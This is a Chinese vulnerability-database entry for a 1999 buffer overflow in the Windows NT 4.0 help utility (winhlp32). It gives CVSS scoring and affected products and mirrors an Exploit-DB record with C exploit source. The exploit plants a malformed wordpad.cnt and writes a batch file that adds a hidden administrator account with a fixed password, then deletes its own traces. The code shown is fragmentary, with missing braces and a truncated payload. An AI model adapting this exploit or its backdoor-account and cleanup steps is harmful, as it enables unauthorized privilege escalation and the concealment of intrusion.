发布时间 :1999-05-17 00:00:00
修订时间 :2008-09-09 08:35:15

[原文]Buffer overflow in Windows NT 4.0 help file utility via a malformed help file.

[CNNVD]Windows NT帮助文件工具漏洞(CNNVD-199905-033)

        Windows NT 4.0中存在缓冲区溢出漏洞。该漏洞借助一个畸形的帮助文件实现帮助文件的功能。

- CVSS (基础分值)

CVSS分值: 4.6 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:microsoft:windows_2000Microsoft Windows 2000
cpe:/o:microsoft:windows_nt:4.0Microsoft Windows NT 4.0
cpe:/o:microsoft:windows_ntMicrosoft Windows NT

- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(VENDOR_ADVISORY)  MS  MS99-015;%5BLN%5D;Q231605
(UNKNOWN)  MSKB  Q231605

- 漏洞信息

Windows NT帮助文件工具漏洞
中危 缓冲区溢出
1999-05-17 00:00:00 2005-05-02 00:00:00
        Windows NT 4.0中存在缓冲区溢出漏洞。该漏洞借助一个畸形的帮助文件实现帮助文件的功能。

- 公告与补丁


- 漏洞信息 (19209)

Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 Help File Buffer Overflow Vulnerability (EDBID:19209)
windows local
1999-05-17 Verified
0 David Litchfield
N/A [点击下载]

Lax permission in the Windows NT help file folder and a buffer overflow in the Help utility may allow malicious users to gain Administrator privileges.

The Windows NT Help utility parses and displays help information for selected applications. The help files are stored in the %SystemRoot%\help directory. The default permissions in this directory allow any user to add new files.

A buffer overflow exists in the Help utility when it attempts to read a .cnt file with an overly long heading string. Content tab informaton files (".cnt") are generated when rich text format files (".rtf") are translated to help files (".hlp"). If the string is longer than 507 bytes winhlp32 truncates the entry and the buffer overflow does not occur.

A malicious user can create a custom .cnt help file with executable code in an entry string which when stored in the help directory and viewed by an unsuspecting user can grant them that users privileges.

The vulnerability is not limited by the permissions of the help file directory as the Help utility will search for a .cnt file first in its execution directory before looking in the help file directory. 

#include <stdio.h>
#include <windows.h>
#include <string.h>

int main(void)
 char eip[5]="\xE5\x27\xF3\x77";

 FILE *fd;
 printf("* WINHLPADD exploits a buffer overrun in Winhlp32.exe *\n");
 printf("*   This version runs on Service Pack 4 machines and  *\n");
 printf("*       assumes a msvcrt.dll version of 4.00.6201     *\n");
 printf("*                                                     *\n");
 printf("* (C) David Litchfield ( '99 *\n");

 fd = fopen("wordpad.cnt", "r");
 if (fd==NULL)
   printf("\n\nWordpad.cnt not found or insufficient rights to access it.\nRun this from the WINNT\\HELP directory");
   return 0;
 printf("\nMaking a copy of real wordpad.cnt - wordpad.sav\n");
 system("copy wordpad.cnt wordpad.sav");
 printf("\n\nCreating wordpad.cnt with exploit code...");
 fd = fopen("wordpad.cnt", "w+");
 if (fd==NULL)  
   printf("Failed to open wordpad.cnt in write mode. Check you have sufficent rights\n");
   return 0;

 fprintf(fd,"2 Opening a document=WRIPAD_OPEN_DOC\n");
 printf("\nCreating batch file add.bat\n\n");
 fd = fopen("add.bat", "w");
 if (fd == NULL)
   printf("Couldn't create batch file. Manually create one instead");
   return 0;
 printf("The batch file will attempt to create a user account called \"winhlp\" and\n");
 printf("with a password of \"winhlp!!\" and add it to the Local Administrators group.\n");
 printf("Once this is done it will reset the files and delete itself.\n");
 fprintf(fd,"net user winhlp winhlp!! /add\n");
 fprintf(fd,"net localgroup administrators winhlp /add\n");
 fprintf(fd,"del wordpad.cnt\ncopy wordpad.sav wordpad.cnt\n");
 fprintf(fd,"del wordpad.sav\n");
 fprintf(fd,"del add.bat\n");
 printf("\nBatch file created.");
 printf("\n\nCreated. Now open up Wordpad and click on Help\n");

 return 0;

NOTE: The attached exploit code has been compiled to run on Windows NT 4.0 SP4 with msvcrt.dll version 4.20.6201		

- 漏洞信息

Microsoft Windows NT Help File Utility Overflow
Local Access Required Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public Vendor Verified

- 漏洞描述

- 时间线

1999-05-18 Unknow
Unknow Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete